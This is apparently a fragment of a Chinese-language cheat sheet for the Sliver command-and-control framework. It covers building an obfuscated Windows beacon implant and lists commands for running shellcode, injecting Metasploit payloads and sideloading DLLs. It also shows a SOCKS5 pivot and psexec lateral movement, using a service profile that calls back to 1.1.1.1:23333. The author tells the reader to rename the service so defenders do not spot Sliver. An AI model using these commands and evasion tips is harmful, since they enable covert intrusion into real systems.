#时间会有点长,因为要混淆,大概输出结果如下 [*] Generating new windows/amd64 beacon implant binary (1m0s) [*] Symbol obfuscation is enabled [*] Build completed in 00:01:05 [*] Implant saved to /xxx/DIFFICULT_DYNAMO.exe
#其他的我懒得翻译了,简单注释一下吧 execute Execute a program on the remote system 执行命令 execute-shellcode Executes the given shellcode in the sliver process 执行shellcode extensions Manage extensions msf Execute an MSF payload in the current process msf-inject Inject an MSF payload into a process pivots List pivots for active session 中继
reconfig Reconfigure the active beacon/session shell Start an interactive shell shikata-ga-nai Polymorphic binary shellcode encoder(shellcode编码器,msf) sideload Load and execute a shared object (DLL) in a remote process
1 2 3 4 5 6 7 8 9 10 11 12 13 14
#socks5开启 Start an in-band SOCKS5 proxy Usage: ====== start [flags] Flags: ====== -h, --help display help -H, --host string Bind a Socks5 Host (default: 127.0.0.1) -P, --port string Bind a Socks5 Port (default: 1081) -u, --user string socks5 auth username (will generate random password) #socks5关闭 socks5 stop -i [ID从1开始]
域相关
1 2 3 4 5 6
getsystem psexec #需要先创建profiles profiles new --format service --skip-symbols --mtls 1.1.1.1:23333 win-svc64 #创建完才能psexec,记得改名字和描述,不然会显示sliver,一看就看出来 psexec -d Description -s ServiceName -p win-svc64 TARGET_FQDN